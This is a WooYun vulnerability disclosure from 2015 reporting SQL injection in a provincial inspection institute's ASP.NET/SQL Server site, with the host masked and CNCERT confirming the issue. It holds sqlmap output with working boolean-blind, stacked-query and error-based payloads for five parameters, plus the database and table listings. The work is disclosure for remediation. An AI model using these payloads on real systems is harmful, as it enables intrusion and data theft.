当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132897

漏洞标题:某省特检研究院SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-12 14:58

修复时间:2015-09-26 16:24

公开时间:2015-09-26 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-12: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

RT

详细说明:

tartget:
http://**.**.**.**/searchlist.aspx?p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr. (GET)
sqlmap:

sqlmap identified the following injection point(s) with a total of 1010 HTTP(s) requests:
---
Parameter: txtAuthor (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98';IF(3089=3089) SELECT 3089 ELSE DROP FUNCTION Dxme--&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.
Parameter: txtSource (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1';IF(5277=5277) SELECT 5277 ELSE DROP FUNCTION hXrh--&txtstarttime=1&txttitle=Mr.
Parameter: txtendtime (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=(SELECT (CASE WHEN (8983=8983) THEN 8983 ELSE 8983*(SELECT 8983 FROM master..sysdatabases) END))&txtSource=1&txtstarttime=1&txttitle=Mr.
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1 AND 2790=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2790=2790) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txtSource=1&txtstarttime=1&txttitle=Mr.
Parameter: txttitle (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.';IF(1707=1707) SELECT 1707 ELSE DROP FUNCTION xozv--
Parameter: txtstarttime (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=(SELECT (CASE WHEN (6166=6166) THEN 6166 ELSE 6166*(SELECT 6166 FROM master..sysdatabases) END))&txttitle=Mr.
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1 AND 2897=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2897=2897) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txttitle=Mr.
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


数据:

available databases [9]:
[*] bobo111501
[*] db_TC
[*] fjtjnew
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


example

Database: fjtjnew
[34 tables]
+--------------------------------------------+
| TC_News                                    |
| TC_News_Class                              |
| TC_Work                                    |
| TC_Work_Class                              |
| TC_Work_Url                                |
| TC_special_news                            |
| dtproperties                               |
| sysconstraints                             |
| syssegments                                |
| tJgcx                                      |
| tLinks                                     |
| tMyzj                                      |
| tMyzj_List                                 |
| tNews                                      |
| tNewsClass                                 |
| tNewsUn                                    |
| tSubOptions                                |
| tSubTitle                                  |
| tSubject                                   |
| tSysMenus                                  |
| tSysUsers                                  |
| tTgxx                                      |
| tTjlm                                      |
| tWork                                      |
| tWorkClass                                 |
| tWorkUrl                                   |
| tZfYjx                                     |
| tZfxxgkClass                               |
| tZfysqgk                                   |
| tZrxx                                      |
| tZxft                                      |
| tZxftImg                                   |
| tZxftInfo                                  |
| tZxftWtzj                                  |
+--------------------------------------------+


点到为止

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-12 16:23

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。

最新状态:

暂无